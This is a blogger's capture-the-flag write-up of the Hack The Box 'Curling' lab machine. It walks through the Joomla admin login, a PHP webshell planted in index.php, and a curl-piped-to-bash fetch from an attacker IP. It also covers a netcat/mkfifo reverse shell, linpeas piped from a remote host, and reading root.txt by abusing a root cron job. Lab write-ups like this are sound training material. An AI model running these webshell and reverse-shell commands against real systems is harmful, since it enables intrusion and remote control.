In this post we will talk about the Nest, the sixth and last challenge from HTB Track “Intro to Dante”.
TL;DR
The Attack Kill chain/Steps can be mapped to:
- Enumerate Web Service;
- Floris credential exposed in cretential.txt;
- Backdoring the index.php page with webshell;
- Reverse shell achived by webshell;
- Compromising Floris user by abusing backup Password file;
- Abusing privilegied schedule routine to access root.txt file
Reconnaissance and Enumeration
Port Enumeration
Enumeration – HTTP 80/TCP
While the HTTP enumeration, its possible to deduce the usage of Cewl to generate an wordlist based on the website contents. I tried this approach but without success, latter I discover the curling2018 string at index page, its almost the Floris Credential,
A source code inspection reveal the secret.txt file
The content of secret.txt is encoded em base64, after decode its content. the password for Floris is achieved.
Initial Access
With the previously password from secret.txt, the attacker managed to authenticate in the Joomla application under administrative privileges. Inside the administrative dashboard, the attacker edit the index.php from Protostar template used by Joomla application.
system($_POST['cmd']);
To use the web shell, the attacker sends a POST request to index.php using the parameter cmd to pass commands to the target machine.
curl -s -X POST http://10.10.10.150/index.php --data 'cmd=curl%20http://10.10.14.4/shell|bash' -H "User-Agent: fuck" | head -n 10To obtain a reverse shell, the attacker create a file called shell and use the http.server to delivery over web server.
cat shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 443 >/tmp/f
python3 -m http.servver 80When the curl request is processed by the target machine, one GET request to /shell is received in the attacker web shell followed by the reverse connection itself.
Privilege Escalation – www-data to Floris
With the reverse shell under www-data user, the attacker start the privilege escalation routine. linPEAS.sh and linux-exploit-suggester.sh are used to perform enumeration.
python3 -c 'import pty;pty.spawn("/bin/bash");'
curl http://10.10.14.4/linpeas.sh | bash | tee -a /tmp/.out-ln
The password_backup contents revels an hex dump from some unknow file. The content was copy and paste to attacker machine.
cat password_backup | xxd -r | bzip2 -d - | gzip -d - | bzip2 -d -
Privilege Escalation – Floris to Root
With the password from password_backup in clear text, the attacker is able to authenticate as Floris.
Its possible to authenticate with Floris using the ssh service at port 22/TCP.
Under Floris privileges, the attacker managed to compromise the user.txt located at /home/floris/user.txt
Enumeration
Under Floris user, the content of admin-area is available. Inspecting the files, the input file looks like a variable declaration and the report file looks like the contents of the webpage.
While inspecting the process running, the attacker discover some cleanup routine being executed by root user targeting t he admin-area directory.
Based on that, the attacker replace the content of input file with malicious instructions to read the root.txt file from root directory.
echo 'url = "file:///root/root.txt"' > input
cat report
Conclusions
- Pretty straightforward box;
- Cewl is something I really don’t use nowadays, so I think there’s two ways for compromise the joomla administrative dashboard;
- I dont managed to get root shell, I read some writeups about this box and someone managed by exploiting the Dirty Sock vulnerability, but i don’t think this is the offical way. I will let this topic open for me in the future.
References
- linpeas.sh https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
- Linux-Exploit-Suggester – https://github.com/mzet-/linux-exploit-suggester
- DirtySock – https://github.com/initstring/dirty_sock
Computer Addicted 
One thought on “WriteUp: Intro to Dante – Curling 6/6”